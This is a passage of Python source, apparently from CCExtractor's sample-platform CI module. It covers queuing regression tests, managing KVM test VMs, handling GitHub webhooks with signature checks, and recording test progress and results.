maintenance_mode = MaintenanceMode.query.filter(MaintenanceMode.platform == platform).first()
if maintenance_mode is not None and maintenance_mode.disabled:
log.debug(f'[{platform}] In maintenance mode! Waiting...')
return
conn = libvirt.open("qemu:///system")
if conn is None:
log.critical(f"[{platform}] Connection to libvirt failed!")
return
try:
vm = conn.lookupByName(kvm_name)
except libvirt.libvirtError:
log.critical(f"[{platform}] No VM named {kvm_name} found!")
return
vm_info = vm.info()
if vm_info[0] != libvirt.VIR_DOMAIN_SHUTOFF:
# Running, check expiry and compare to runtime
status = Kvm.query.filter(Kvm.name == kvm_name).first()
max_runtime = config.get("KVM_MAX_RUNTIME", 120)
if status is not None:
if datetime.datetime.now() - status.timestamp >= datetime.timedelta(minutes=max_runtime):
test_progress = TestProgress(status.test.id, TestStatus.canceled, 'Runtime exceeded')
db.add(test_progress)
db.delete(status)
db.commit()
if vm.destroy() == -1:
log.critical(f"[{platform}] Failed to shut down {kvm_name}")
return
else:
log.info(f"[{platform}] Current job not expired yet.")
return
else:
log.warn(f"[{platform}] No task, but VM is running! Hard reset necessary")
if vm.destroy() == -1:
log.critical(f"[{platform}] Failed to shut down {kvm_name}")
return
# Check if there's no KVM status left
status = Kvm.query.filter(Kvm.name == kvm_name).first()
if status is not None:
log.warn(f"[{platform}] KVM is powered off, but test {status.test.id} still present, deleting entry")
db.delete(status)
db.commit()
# Get oldest test for this platform
finished_tests = db.query(TestProgress.test_id).filter(
TestProgress.status.in_([TestStatus.canceled, TestStatus.completed])
).subquery()
fork_location = f"%/{github_config['repository_owner']}/{github_config['repository']}.git"
fork = Fork.query.filter(Fork.github.like(fork_location)).first()
test = Test.query.filter(
Test.id.notin_(finished_tests), Test.platform == platform, Test.fork_id == fork.id
).order_by(Test.id.asc()).first()
if test is None:
test = Test.query.filter(Test.id.notin_(finished_tests), Test.platform == platform).order_by(
Test.id.asc()).first()
if test is None:
log.info(f'[{platform}] No more tests to run, returning')
return
if test.test_type == TestType.pull_request and test.pr_nr == 0:
log.warn(f'[{platform}] Test {test.id} is invalid, deleting')
db.delete(test)
db.commit()
return
# Reset to snapshot
if vm.hasCurrentSnapshot() != 1:
log.critical(f"[{platform}] VM {kvm_name} has no current snapshot set!")
return
snapshot = vm.snapshotCurrent()
if vm.revertToSnapshot(snapshot) == -1:
log.critical(f"[{platform}] Failed to revert to {snapshot.getName()} for {kvm_name}")
return
log.info(f"[{platform}] Reverted to {snapshot.getName()} for {kvm_name}")
log.debug(f'[{platform}] Starting test {test.id}')
status = Kvm(kvm_name, test.id)
# Prepare data
# 0) Write url to file
with app.app_context():
full_url = url_for('ci.progress_reporter', test_id=test.id, token=test.token, _external=True, _scheme="https")
file_path = os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'vm_data', kvm_name, 'reportURL')
with open(file_path, 'w') as f:
f.write(full_url)
# 1) Generate test files
base_folder = os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'vm_data', kvm_name, 'ci-tests')
categories = Category.query.order_by(Category.id.desc()).all()
commit_name = 'fetch_commit_' + platform.value
commit_hash = GeneralData.query.filter(GeneralData.key == commit_name).first().value
last_commit = Test.query.filter(and_(Test.commit == commit_hash, Test.platform == platform)).first()
log.debug(f"[{platform}] We will compare against the results of test {last_commit.id}")
regression_ids = test.get_customized_regressiontests()
# Init collection file
multi_test = etree.Element('multitest')
for category in categories:
# Skip categories without tests
if len(category.regression_tests) == 0:
continue
# Create XML file for test
file_name = '{name}.xml'.format(name=category.name)
single_test = etree.Element('tests')
should_write_xml = False
for regression_test in category.regression_tests:
if regression_test.id not in regression_ids:
log.debug(f'Skipping RT #{regression_test.id} ({category.name}) as not in scope')
continue
should_write_xml = True
entry = etree.SubElement(single_test, 'entry', id=str(regression_test.id))
command = etree.SubElement(entry, 'command')
command.text = regression_test.command
input_node = etree.SubElement(entry, 'input', type=regression_test.input_type.value)
# Need a path that is relative to the folder we provide inside the CI environment.
input_node.text = regression_test.sample.filename
output_node = etree.SubElement(entry, 'output')
output_node.text = regression_test.output_type.value
compare = etree.SubElement(entry, 'compare')
last_files = TestResultFile.query.filter(and_(
TestResultFile.test_id == last_commit.id,
TestResultFile.regression_test_id == regression_test.id
)).subquery()
for output_file in regression_test.output_files:
ignore_file = str(output_file.ignore).lower()
file_node = etree.SubElement(compare, 'file', ignore=ignore_file, id=str(output_file.id))
last_commit_files = db.query(last_files.c.got).filter(and_(
last_files.c.regression_test_output_id == output_file.id,
last_files.c.got.isnot(None)
)).first()
correct = etree.SubElement(file_node, 'correct')
# Need a path that is relative to the folder we provide inside the CI environment.
if last_commit_files is None:
log.debug(f"Selecting original file for RT #{regression_test.id} ({category.name})")
correct.text = output_file.filename_correct
else:
correct.text = output_file.create_correct_filename(last_commit_files[0])
expected = etree.SubElement(file_node, 'expected')
expected.text = output_file.filename_expected(regression_test.sample.sha)
if not should_write_xml:
continue
save_xml_to_file(single_test, base_folder, file_name)
# Append to collection file
test_file = etree.SubElement(multi_test, 'testfile')
location = etree.SubElement(test_file, 'location')
location.text = file_name
save_xml_to_file(multi_test, base_folder, 'TestAll.xml')
# 2) Create git repo clone and merge PR into it (if necessary)
try:
repo = Repo(os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'vm_data', kvm_name, 'unsafe-ccextractor'))
except InvalidGitRepositoryError:
log.critical(f"[{platform}] Could not open CCExtractor's repository copy!")
return
# Return to master
repo.heads.master.checkout(True)
# Update repository from upstream
try:
github_url = test.fork.github
if is_main_repo(github_url):
origin = repo.remote('origin')
else:
fork_id = test.fork.id
remote = f'fork_{fork_id}'
if remote in [remote.name for remote in repo.remotes]:
origin = repo.remote(remote)
else:
origin = repo.create_remote(remote, url=github_url)
except ValueError:
log.critical(f"[{platform}] Origin remote doesn't exist!")
return
fetch_info = origin.fetch()
if len(fetch_info) == 0:
log.info(f'[{platform}] Fetch from remote returned no new data...')
# Checkout to Remote Master
repo.git.checkout(origin.refs.master)
# Pull code (finally)
pull_info = origin.pull('master')
if len(pull_info) == 0:
log.info(f"[{platform}] Pull from remote returned no new data...")
elif pull_info[0].flags > 128:
log.critical(f"[{platform}] Did not pull any information from remote: {pull_info[0].flags}!")
return
ci_branch = 'CI_Branch'
# Delete the test branch if it exists, and recreate
try:
repo.delete_head(ci_branch, force=True)
except GitCommandError:
log.info(f"[{platform}] Could not delete CI_Branch head")
# Remove possible left rebase-apply directory
try:
shutil.rmtree(os.path.join(config.get('SAMPLE_REPOSITORY', ''), 'unsafe-ccextractor', '.git', 'rebase-apply'))
except OSError:
log.info(f"[{platform}] Could not delete rebase-apply")
# If PR, merge, otherwise reset to commit
if test.test_type == TestType.pull_request:
# Fetch PR (stored under origin/pull/<id>/head)
pull_info = origin.fetch(f'pull/{test.pr_nr}/head:{ci_branch}')
if len(pull_info) == 0:
log.warn(f"[{platform}] Did not pull any information from remote PR!")
elif pull_info[0].flags > 128:
log.critical(f"[{platform}] Did not pull any information from remote PR: {pull_info[0].flags}!")
return
try:
test_branch = repo.heads[ci_branch]
except IndexError:
log.critical(f'{ci_branch} does not exist')
return
test_branch.checkout(True)
try:
pull = repository.pulls(f'{test.pr_nr}').get()
except ApiError as a:
log.error(f'Got an exception while fetching the PR payload! Message: {a.message}')
return
if pull['mergeable'] is False:
progress = TestProgress(test.id, TestStatus.canceled, "Commit could not be merged", datetime.datetime.now())
db.add(progress)
db.commit()
try:
with app.app_context():
repository.statuses(test.commit).post(
state=Status.FAILURE,
description="Tests canceled due to merge conflict",
context=f"CI - {test.platform.value}",
target_url=url_for('test.by_id', test_id=test.id, _external=True)
)
except ApiError as a:
log.error(f'Got an exception while posting to GitHub! Message: {a.message}')
return
# Merge on master if no conflict
repo.git.merge('master')
else:
test_branch = repo.create_head(ci_branch, origin.refs.master)
test_branch.checkout(True)
try:
repo.head.reset(test.commit, working_tree=True)
except GitCommandError:
log.warn(f"[{platform}] Commit {test.commit} for test {test.id} does not exist!")
return
# Power on machine
try:
vm.create()
db.add(status)
db.commit()
except libvirt.libvirtError as e:
log.critical(f"[{platform}] Failed to launch VM {kvm_name}")
log.critical(f"Information about failure: code: {e.get_error_code()}, domain: {e.get_error_domain()}, "
f"level: {e.get_error_level()}, message: {e.get_error_message()}")
except IntegrityError:
log.warn(f"[{platform}] Duplicate entry for {test.id}")
# Close connection to libvirt
conn.close()
def save_xml_to_file(xml_node, folder_name, file_name) -> None:
"""
Save the given XML node to a file in a certain folder.
:param xml_node: The XML content element to write to the file.
:type xml_node: Element
:param folder_name: The folder name.
:type folder_name: str
:param file_name: The name of the file
:type file_name: str
:return: Nothing
:rtype: None
"""
xml_node.getroottree().write(
os.path.join(folder_name, file_name), encoding='utf-8', xml_declaration=True, pretty_print=True
)
def queue_test(db, gh_commit, commit, test_type, branch="master", pr_nr=0) -> None:
"""
Store test details into Test model for each platform, and post the status to GitHub.
:param db: Database connection.
:type db: sqlalchemy.orm.scoped_session
:param gh_commit: The GitHub API call for the commit. Can be None
:type gh_commit: Any
:param commit: The commit hash.
:type commit: str
:param test_type: The type of test
:type test_type: TestType
:param branch: Branch name
:type branch: str
:param pr_nr: Pull Request number, if applicable.
:type pr_nr: int
:return: Nothing
:rtype: None
"""
from run import log
fork_url = f"%/{g.github['repository_owner']}/{g.github['repository']}.git"
fork = Fork.query.filter(Fork.github.like(fork_url)).first()
if test_type == TestType.pull_request:
log.debug('pull request test type detected')
branch = "pull_request"
linux_test = Test(TestPlatform.linux, test_type, fork.id, branch, commit, pr_nr)
db.add(linux_test)
windows_test = Test(TestPlatform.windows, test_type, fork.id, branch, commit, pr_nr)
db.add(windows_test)
db.commit()
add_customized_regression_tests(linux_test.id)
add_customized_regression_tests(windows_test.id)
if gh_commit is not None:
status_entries = {
linux_test.platform.value: linux_test.id,
windows_test.platform.value: windows_test.id
}
for platform_name, test_id in status_entries.items():
try:
gh_commit.post(
state=Status.PENDING,
description="Tests queued",
context=f"CI - {platform_name}",
target_url=url_for('test.by_id', test_id=test_id, _external=True)
)
except ApiError as a:
log.critical(f'Could not post to GitHub! Response: {a.response}')
log.debug("Created tests, waiting for cron...")
def inform_mailing_list(mailer, id, title, author, body) -> None:
"""
Send mail to subscribed users when a issue is opened via the Webhook.
:param mailer: The mailer instance
:type mailer: Mailer
:param id: ID of the Issue Opened
:type id: int
:param title: Title of the Created Issue
:type title: str
:param author: The Authors Username of the Issue
:type author: str
:param body: The Content of the Issue
:type body: str
"""
from run import get_github_issue_link
subject = f"GitHub Issue #{id}"
url = get_github_issue_link(id)
if not mailer.send_simple_message({
"to": "ccextractor-dev@googlegroups.com",
"subject": subject,
"html": get_html_issue_body(title=title, author=author, body=body, issue_number=id, url=url)
}):
g.log.error('failed to send issue to mailing list')
def get_html_issue_body(title, author, body, issue_number, url) -> Any:
"""
Curate a HTML formatted body for the issue mail.
:param title: title of the issue
:type title: str
:param author: author of the issue
:type author: str
:param body: content of the issue
:type body: str
:param issue_number: issue number
:type issue_number: int
:param url: link to the issue
:type url: str
:return: email body in html format
:rtype: str
"""
from run import app
html_issue_body = markdown(body, extras=["target-blank-links", "task_list", "code-friendly"])
template = app.jinja_env.get_or_select_template("email/new_issue.txt")
html_email_body = template.render(title=title, author=author, body=html_issue_body, url=url)
return html_email_body
@mod_ci.route('/start-ci', methods=['GET', 'POST'])
@request_from_github()
def start_ci():
"""
Perform various actions when the GitHub webhook is triggered.
Reaction to the next events need to be processed
(after verification):
- Ping (for fun)
- Push
- Pull Request
- Issues
"""
if request.method != 'POST':
return 'OK'
else:
abort_code = 418
event = request.headers.get('X-GitHub-Event')
if event == "ping":
g.log.debug('server ping successful')
return json.dumps({'msg': 'Hi!'})
x_hub_signature = request.headers.get('X-Hub-Signature')
if not is_valid_signature(x_hub_signature, request.data, g.github['ci_key']):
g.log.warning(f'CI signature failed: {x_hub_signature}')
abort(abort_code)
payload = request.get_json()
if payload is None:
g.log.warning(f'CI payload is empty')
abort(abort_code)
gh = GitHub(access_token=g.github['bot_token'])
repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
if event == "push":
g.log.debug('push event detected')
if 'after' in payload:
commit_hash = payload['after']
github_status = repository.statuses(commit_hash)
# Update the db to the new last commit
ref = repository.git().refs('heads/master').get()
last_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first()
for platform in TestPlatform.values():
commit_name = 'fetch_commit_' + platform
fetch_commit = GeneralData.query.filter(GeneralData.key == commit_name).first()
if fetch_commit is None:
prev_commit = GeneralData(commit_name, last_commit.value)
g.db.add(prev_commit)
last_commit.value = ref['object']['sha']
g.db.commit()
queue_test(g.db, github_status, commit_hash, TestType.commit)
else:
g.log.warning('Unknown push type! Dumping payload for analysis')
g.log.warning(payload)
elif event == "pull_request":
g.log.debug('Pull Request event detected')
# If it's a valid PR, run the tests
pr_nr = payload['pull_request']['number']
if payload['action'] in ['opened', 'synchronize', 'reopened']:
try:
commit_hash = payload['pull_request']['head']['sha']
github_status = repository.statuses(commit_hash)
except KeyError:
g.log.error("Didn't find a SHA value for a newly opened PR!")
g.log.error(payload)
return 'ERROR'
# Check if user blacklisted
user_id = payload['pull_request']['user']['id']
if BlockedUsers.query.filter(BlockedUsers.user_id == user_id).first() is not None:
g.log.warning("User Blacklisted")
github_status.post(
state=Status.ERROR,
description="CI start aborted. You may be blocked from accessing this functionality",
target_url=url_for('home.index', _external=True)
)
return 'ERROR'
queue_test(g.db, github_status, commit_hash, TestType.pull_request, pr_nr=pr_nr)
elif payload['action'] == 'closed':
g.log.debug('PR was closed, no after hash available')
# Cancel running queue
tests = Test.query.filter(Test.pr_nr == pr_nr).all()
for test in tests:
# Add cancelled status only if the test hasn't started yet
if len(test.progress) > 0:
continue
progress = TestProgress(test.id, TestStatus.canceled, "PR closed", datetime.datetime.now())
g.db.add(progress)
repository.statuses(test.commit).post(
state=Status.FAILURE,
description="Tests canceled",
context=f"CI - {test.platform.value}",
target_url=url_for('test.by_id', test_id=test.id, _external=True)
)
elif event == "issues":
g.log.debug('issues event detected')
issue_data = payload['issue']
issue_action = payload['action']
issue = Issue.query.filter(Issue.issue_id == issue_data['number']).first()
issue_title = issue_data['title']
issue_id = issue_data['number']
issue_author = issue_data['user']['login']
issue_body = issue_data['body']
if issue_action == "opened":
inform_mailing_list(g.mailer, issue_id, issue_title, issue_author, issue_body)
if issue is not None:
issue.title = issue_title
issue.status = issue_data['state']
g.db.commit()
elif event == "release":
g.log.debug("Release webhook triggered")
release_data = payload['release']
action = payload['action']
release_version = release_data['tag_name']
if release_version[0] == 'v':
release_version = release_version[1:]
if action == "prereleased":
g.log.debug("Ignoring event meant for pre-release")
elif action in ["deleted", "unpublished"]:
g.log.debug("Received delete/unpublished action")
CCExtractorVersion.query.filter_by(version=release_version).delete()
g.db.commit()
g.log.info(f"Successfully deleted release {release_version} on {action} action")
elif action in ["edited", "published"]:
g.log.debug(f"Latest release version is {release_version}")
release_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first().value
release_date = release_data['published_at']
if action == "edited":
release = CCExtractorVersion.query.filter(CCExtractorVersion.version == release_version).one()
release.released = datetime.datetime.strptime(release_date, '%Y-%m-%dT%H:%M:%SZ').date()
release.commit = release_commit
else:
release = CCExtractorVersion(release_version, release_date, release_commit)
g.db.add(release)
g.db.commit()
g.log.info(f"Successfully updated release version with webhook action '{action}'")
# adding test corresponding to last commit to the baseline regression results
# this is not altered when a release is deleted or unpublished since it's based on commit
test = Test.query.filter(and_(Test.commit == release_commit,
Test.platform == TestPlatform.linux)).first()
test_result_file = g.db.query(TestResultFile).filter(TestResultFile.test_id == test.id).subquery()
test_result = g.db.query(TestResult).filter(TestResult.test_id == test.id).subquery()
g.db.query(RegressionTestOutput.correct).filter(
and_(RegressionTestOutput.regression_id == test_result_file.c.regression_test_id,
test_result_file.c.got is not None)).values(test_result_file.c.got)
g.db.query(RegressionTest.expected_rc).filter(
RegressionTest.id == test_result.c.regression_test_id
).values(test_result.c.expected_rc)
g.db.commit()
g.log.info("Successfully added tests for latest release!")
else:
g.log.warning(f"Unsupported release action: {action}")
else:
g.log.warning(f'CI unrecognized event: {event}')
return json.dumps({'msg': 'EOL'})
def update_build_badge(status, test) -> None:
"""
Build status badge for current test to be displayed on sample-platform.
:param status: current testing status
:type status: str
:param test: current commit that is tested
:type test: Test
:return: null
:rtype: null
"""
if test.test_type == TestType.commit and is_main_repo(test.fork.github):
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
original_location = os.path.join(parent_dir, 'static', 'svg', f'{status.upper()}-{test.platform.values}.svg')
build_status_location = os.path.join(parent_dir, 'static', 'img', 'status', f'build-{test.platform.values}.svg')
shutil.copyfile(original_location, build_status_location)
g.log.info('Build badge updated successfully!')
@mod_ci.route('/progress-reporter/<test_id>/<token>', methods=['POST'])
def progress_reporter(test_id, token):
"""
Handle the progress of a certain test after validating the token. If necessary, update the status on GitHub.
:param test_id: The id of the test to update.
:type test_id: int
:param token: The token to check the validity of the request.
:type token: str
:return: Nothing.
:rtype: None
"""
from run import config, log
test = Test.query.filter(Test.id == test_id).first()
if test is not None and test.token == token:
repo_folder = config.get('SAMPLE_REPOSITORY', '')
if 'type' in request.form:
if request.form['type'] == 'progress':
log.info('[PROGRESS_REPORTER] Progress reported')
if not progress_type_request(log, test, test_id, request):
return "FAIL"
elif request.form['type'] == 'equality':
log.info('[PROGRESS_REPORTER] Equality reported')
equality_type_request(log, test_id, test, request)
elif request.form['type'] == 'logupload':
log.info('[PROGRESS_REPORTER] Log upload')
if not upload_log_type_request(log, test_id, repo_folder, test, request):
return "EMPTY"
elif request.form['type'] == 'upload':
log.info('[PROGRESS_REPORTER] File upload')
if not upload_type_request(log, test_id, repo_folder, test, request):
return "EMPTY"
elif request.form['type'] == 'finish':
log.info('[PROGRESS_REPORTER] Test finished')
finish_type_request(log, test_id, test, request)
else:
return "FAIL"
return "OK"
return "FAIL"
def progress_type_request(log, test, test_id, request) -> bool:
"""
Handle progress updates for progress reporter.
:param log: logger
:type log: Logger
:param test: concerned test
:type test: Test
:param test_id: The id of the test to update.
:type test_id: int
:param request: Request parameters
:type request: Request
"""
status = TestStatus.from_string(request.form['status'])
current_status = TestStatus.progress_step(status)
message = request.form['message']
if len(test.progress) != 0:
last_status = TestStatus.progress_step(test.progress[-1].status)
if last_status in [TestStatus.completed, TestStatus.canceled]:
return False
if last_status > current_status:
status = TestStatus.canceled # type: ignore
message = "Duplicate Entries"
if last_status < current_status:
# get KVM start time for finding KVM preparation time
kvm_entry = Kvm.query.filter(Kvm.test_id == test_id).first()
if status == TestStatus.building:
log.info('test preparation finished')
prep_finish_time = datetime.datetime.now()
# save preparation finish time
kvm_entry.timestamp_prep_finished = prep_finish_time
g.db.commit()
# set time taken in seconds to do preparation
time_diff = (prep_finish_time - kvm_entry.timestamp).total_seconds()
set_avg_time(test.platform, "prep", time_diff)
elif status == TestStatus.testing:
log.info('test build procedure finished')
build_finish_time = datetime.datetime.now()
# save build finish time
kvm_entry.timestamp_build_finished = build_finish_time
g.db.commit()
# set time taken in seconds to do preparation
time_diff = (build_finish_time - kvm_entry.timestamp_prep_finished).total_seconds()
set_avg_time(test.platform, "build", time_diff)
progress = TestProgress(test.id, status, message)
g.db.add(progress)
g.db.commit()
gh = GitHub(access_token=g.github['bot_token'])
repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
# Store the test commit for testing in case of commit
if status == TestStatus.completed and is_main_repo(test.fork.github):
commit_name = 'fetch_commit_' + test.platform.value
commit = GeneralData.query.filter(GeneralData.key == commit_name).first()
fetch_commit = Test.query.filter(
and_(Test.commit == commit.value, Test.platform == test.platform)
).first()
if test.test_type == TestType.commit and test.id > fetch_commit.id:
commit.value = test.commit
g.db.commit()
# If status is complete, remove the Kvm entry
if status in [TestStatus.completed, TestStatus.canceled]:
log.debug("Test {id} has been {status}".format(id=test_id, status=status))
var_average = 'average_time_' + test.platform.value
current_average = GeneralData.query.filter(GeneralData.key == var_average).first()
average_time = 0
total_time = 0
if current_average is None:
platform_tests = g.db.query(Test.id).filter(Test.platform == test.platform).subquery()
finished_tests = g.db.query(TestProgress.test_id).filter(
and_(
TestProgress.status.in_([TestStatus.canceled, TestStatus.completed]),
TestProgress.test_id.in_(platform_tests)
)
).subquery()
in_progress_statuses = [TestStatus.preparation, TestStatus.completed, TestStatus.canceled]
finished_tests_progress = g.db.query(TestProgress).filter(
and_(
TestProgress.test_id.in_(finished_tests),
TestProgress.status.in_(in_progress_statuses)
)
).subquery()
times = g.db.query(
finished_tests_progress.c.test_id,
label('time', func.group_concat(finished_tests_progress.c.timestamp))
).group_by(finished_tests_progress.c.test_id).all()
for p in times:
parts = p.time.split(',')
start = datetime.datetime.strptime(parts[0], '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(parts[-1], '%Y-%m-%d %H:%M:%S')
total_time += int((end - start).total_seconds())
if len(times) != 0:
average_time = total_time // len(times)
new_avg = GeneralData(var_average, average_time)
log.info(f'new average time {str(average_time)} set successfully')
g.db.add(new_avg)
g.db.commit()
else:
all_results = TestResult.query.count()
regression_test_count = RegressionTest.query.count()
number_test = all_results / regression_test_count
updated_average = float(current_average.value) * (number_test - 1)
pr = test.progress_data()
end_time = pr['end']
start_time = pr['start']
if end_time.tzinfo is not None:
end_time = end_time.replace(tzinfo=None)
if start_time.tzinfo is not None:
start_time = start_time.replace(tzinfo=None)
last_running_test = end_time - start_time
updated_average = updated_average + last_running_test.total_seconds()
current_average.value = updated_average // number_test
g.db.commit()
log.info(f'average time updated to {str(current_average.value)}')
kvm = Kvm.query.filter(Kvm.test_id == test_id).first()
if kvm is not None:
log.debug("Removing KVM entry")
g.db.delete(kvm)
g.db.commit()
# Post status update
state = Status.PENDING
target_url = url_for('test.by_id', test_id=test.id, _external=True)
context = "CI - {name}".format(name=test.platform.value)
if status == TestStatus.canceled:
state = Status.ERROR
message = 'Tests aborted due to an error; please check'
elif status == TestStatus.completed:
# Determine if success or failure
# It fails if any of these happen:
# - A crash (unexpected exit code)
# - A not None value on the "got" of a TestResultFile (
# meaning the hashes do not match)
crashes = g.db.query(count(TestResult.exit_code)).filter(
and_(
TestResult.test_id == test.id,
TestResult.exit_code != TestResult.expected_rc
)).scalar()
results_zero_rc = g.db.query(RegressionTest.id).filter(
RegressionTest.expected_rc == 0
).subquery()
results = g.db.query(count(TestResultFile.got)).filter(
and_(
TestResultFile.test_id == test.id,
TestResultFile.regression_test_id.in_(results_zero_rc),
TestResultFile.got.isnot(None)
)
).scalar()
log.debug('Test {id} completed: {crashes} crashes, {results} results'.format(
id=test.id, crashes=crashes, results=results
))
if crashes > 0 or results > 0:
state = Status.FAILURE
message = 'Not all tests completed successfully, please check'
else:
state = Status.SUCCESS
message = 'Tests completed'
if test.test_type == TestType.pull_request:
comment_pr(test.id, state, test.pr_nr, test.platform.name)
update_build_badge(state, test)
else:
message = progress.message
gh_commit = repository.statuses(test.commit)
try:
gh_commit.post(state=state, description=message, context=context, target_url=target_url)
except ApiError as a:
log.error('Got an exception while posting to GitHub! Message: {message}'.format(message=a.message))
if status in [TestStatus.completed, TestStatus.canceled]:
# Start next test if necessary, on the same platform
start_platforms(g.db, repository, 60, test.platform)
return True
def equality_type_request(log, test_id, test, request):
"""
Handle equality request type for progress reporter.
:param log: logger
:type log: Logger
:param test_id: The id of the test to update.
:type test_id: int
:param test: concerned test
:type test: Test
:param request: Request parameters
:type request: Request
"""
log.debug('Equality for {t}/{rt}/{rto}'.format(
t=test_id, rt=request.form['test_id'], rto=request.form['test_file_id'])
)
rto = RegressionTestOutput.query.filter(RegressionTestOutput.id == request.form['test_file_id']).first()
if rto is None:
# Equality posted on a file that's ignored presumably
log.info('No rto for {test_id}: {test}'.format(test_id=test_id, test=request.form['test_id']))
else:
result_file = TestResultFile(test.id, request.form['test_id'], rto.id, rto.correct)
g.db.add(result_file)
g.db.commit()
def upload_log_type_request(log, test_id, repo_folder, test, request) -> bool:
"""
Handle logupload request type for progress reporter.
:param log: logger
:type log: Logger
:param test_id: The id of the test to update.
:type test_id: int
:param repo_folder: repository folder
:type repo_folder: str
:param test: concerned test
:type test: Test
:param request: Request parameters
:type request: Request
"""
log.debug("Received log file for test {id}".format(id=test_id))
# File upload, process
if 'file' in request.files:
uploaded_file = request.files['file']
filename = secure_filename(uploaded_file.filename)
if filename is '':
return False
temp_path = os.path.join(repo_folder, 'TempFiles', filename)
# Save to temporary location
uploaded_file.save(temp_path)
final_path = os.path.join(repo_folder, 'LogFiles', '{id}{ext}'.format(id=test.id, ext='.txt'))
os.rename(temp_path, final_path)
log.debug("Stored log file")
return True
return False
def upload_type_request(log, test_id, repo_folder, test, request) -> bool:
"""
Handle upload request type for progress reporter.
:param log: logger
:type log: Logger
:param test_id: The id of the test to update.
:type test_id: int
:param repo_folder: repository folder
:type repo_folder: str
:param test: concerned test
:type test: Test
:param request: Request parameters
:type request: Request
"""
log.debug('Upload for {t}/{rt}/{rto}'.format(
t=test_id, rt=request.form['test_id'], rto=request.form['test_file_id'])
)
# File upload, process
if 'file' in request.files:
uploaded_file = request.files['file']
filename = secure_filename(uploaded_file.filename)
if filename is '':
log.warning('empty filename provided for uploading')
return False
temp_path = os.path.join(repo_folder, 'TempFiles', filename)
# Save to temporary location
uploaded_file.save(temp_path)
# Get hash and check if it's already been submitted
hash_sha256 = hashlib.sha256()
with open(temp_path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_sha256.update(chunk)
file_hash = hash_sha256.hexdigest()
filename, file_extension = os.path.splitext(filename)
final_path = os.path.join(
repo_folder, 'TestResults', '{hash}{ext}'.format(hash=file_hash, ext=file_extension)
)
os.rename(temp_path, final_path)
rto = RegressionTestOutput.query.filter(
RegressionTestOutput.id == request.form['test_file_id']).first()
result_file = TestResultFile(test.id, request.form['test_id'], rto.id, rto.correct, file_hash)
g.db.add(result_file)
g.db.commit()
return True
return False
def finish_type_request(log, test_id, test, request):
"""
Handle finish request type for progress reporter.
:param log: logger
:type log: Logger
:param test_id: The id of the test to update.
:type test_id: int
:param test: concerned test
:type test: Test
:param request: Request parameters
:type request: Request
"""
log.debug('Finish for {t}/{rt}'.format(t=test_id, rt=request.form['test_id']))
regression_test = RegressionTest.query.filter(RegressionTest.id == request.form['test_id']).first()
result = TestResult(
test.id, regression_test.id, request.form['runTime'],
request.form['exitCode'], regression_test.expected_rc
)
g.db.add(result)
try:
g.db.commit()
except IntegrityError as e:
log.error('Could not save the results: {msg}'.format(msg=e))
def set_avg_time(platform: Test.platform, process_type: str, time_taken: int) -> None:
"""
Set average platform preparation time.
:param platform: platform to which the average time belongs
:type platform: TestPlatform
:param process_type: process to save the average time for
:type process_type: str
:param time_taken: time taken to complete the process
:type time_taken: int
"""
val_key = "avg_" + str(process_type) + "_time_" + platform.value
count_key = "avg_" + str(process_type) + "_count_" + platform.value
current_avg_count = GeneralData.query.filter(GeneralData.key == count_key).first()
# adding average data the first time
if current_avg_count is None:
avg_count_GD = GeneralData(count_key, str(1))
avg_time_GD = GeneralData(val_key, str(time_taken))
g.db.add(avg_count_GD)
g.db.add(avg_time_GD)
else:
current_average = GeneralData.query.filter(GeneralData.key == val_key).first()
avg_count = int(current_avg_count.value)
avg_value = int(float(current_average.value))
new_average = ((avg_value * avg_count) + time_taken) / (avg_count + 1)
current_avg_count.value = str(avg_count + 1)
current_average.value = str(new_average)
g.db.commit()
def comment_pr(test_id, state, pr_nr, platform) -> None:
"""
Upload the test report to the github PR as comment.
:param test_id: The identity of Test whose report will be uploaded
:type test_id: str
:param state: The state of the PR.
:type state: Status
:param pr_nr: PR number to which test commit is related and comment will be uploaded
:type: str
:param platform
:type: str
"""
from run import app, log
regression_testid_passed = g.db.query(TestResult.regression_test_id).outerjoin(
TestResultFile, TestResult.test_id == TestResultFile.test_id).filter(
TestResult.test_id == test_id,
TestResult.expected_rc == TestResult.exit_code,
or_(
TestResult.exit_code != 0,
and_(TestResult.exit_code == 0,
TestResult.regression_test_id == TestResultFile.regression_test_id,
TestResultFile.got.is_(None)
),
and_(
RegressionTestOutput.regression_id == TestResult.regression_test_id,
RegressionTestOutput.ignore.is_(True),
))).subquery()
passed = g.db.query(label('category_id', Category.id), label(
'success', count(regressionTestLinkTable.c.regression_id))).filter(
regressionTestLinkTable.c.regression_id.in_(regression_testid_passed),
Category.id == regressionTestLinkTable.c.category_id).group_by(
regressionTestLinkTable.c.category_id).subquery()
tot = g.db.query(label('category', Category.name), label('total', count(regressionTestLinkTable.c.regression_id)),
label('success', passed.c.success)).outerjoin(
passed, passed.c.category_id == Category.id).filter(
Category.id == regressionTestLinkTable.c.category_id).group_by(
regressionTestLinkTable.c.category_id).all()
regression_testid_failed = RegressionTest.query.filter(RegressionTest.id.notin_(regression_testid_passed)).all()
template = app.jinja_env.get_or_select_template('ci/pr_comment.txt')
message = template.render(tests=tot, failed_tests=regression_testid_failed, test_id=test_id,
state=state, platform=platform)
log.debug('GitHub PR Comment Message Created for Test_id: {test_id}'.format(test_id=test_id))
try:
gh = GitHub(access_token=g.github['bot_token'])
repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
# Pull requests are just issues with code, so github consider pr comments in issues
pull_request = repository.issues(pr_nr)
comments = pull_request.comments().get()
bot_name = g.github['bot_name']
comment_id = None
for comment in comments:
if comment['user']['login'] == bot_name and platform in comment['body']:
comment_id = comment['id']
break
log.debug('GitHub PR Comment ID Fetched for Test_id: {test_id}'.format(test_id=test_id))
if comment_id is None:
comment = pull_request.comments().post(body=message)
comment_id = comment['id']
else:
repository.issues().comments(comment_id).post(body=message)
log.debug('GitHub PR Comment ID {comment} Uploaded for Test_id: {test_id}'.format(
comment=comment_id, test_id=test_id))
except Exception as e:
